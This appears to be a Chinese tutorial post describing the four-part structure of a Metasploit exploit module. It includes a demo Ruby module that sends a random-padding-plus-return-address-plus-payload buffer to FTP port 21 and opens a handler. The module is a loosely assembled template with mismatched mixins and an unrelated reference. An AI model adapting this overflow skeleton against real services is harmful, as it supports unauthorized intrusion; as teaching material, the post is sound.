msf的exp模块

msf的exp模块

分为4个部分

  1. class 定义类,导入的msf的类,叫mixins

  2. include 导入函数库

  3. 初始化,定义参数,模块的值

  4. 定义要执行的exp

如果语法写错了,可以在日志里看: /root/.msf4/logs/framework.log

1

写的demo,作用是调用tcp模块,进行ftp连接

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Seh
  include Msf::Exploit::Egghunter
  include Msf::Exploit::Tcp
  
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'whale_tcp_connect_test',
      'Description'    => %q{
        tcp connect
      },
      'License'        => MSF_LICENSE,
      'Author'         => ['whale3070'],
      'DisclosureDate' => '2020-12-27',
      'References'     =>
        [
          ['URL', 'https://blog.gdssecurity.com/labs/2017/9/5/linux-based-inter-process-code-injection-without-ptrace2.html']
        ],
      'Platform'       => ['linux'],
      'Arch'           =>
        [
          ARCH_X86,
          ARCH_X64,
          ARCH_ARMLE,
          ARCH_AARCH64,
          ARCH_PPC,
          ARCH_MIPSLE,
          ARCH_MIPSBE
        ],
      'SessionTypes'   => ['shell', 'meterpreter'],
      'Targets'        => [['Auto', {}]],
      'DefaultOptions' =>
        {
          'PrependSetresuid' => true,
          'PrependSetresgid' => true,
          'PrependFork'      => true,
          'WfsDelay'         => 30
        },
      'DefaultTarget'  => 0))
    register_options( 
      [
      Opt::RPORT(21),
      ],self.class)
  end

  def exploit
    connect
    buf = rand_text_alpha(1024)
    buf << [ target.ret ].pack('V')
    buf << payload.encoded
    
    sock.put(buf)
    sock.get_once
    
    handler
  end
end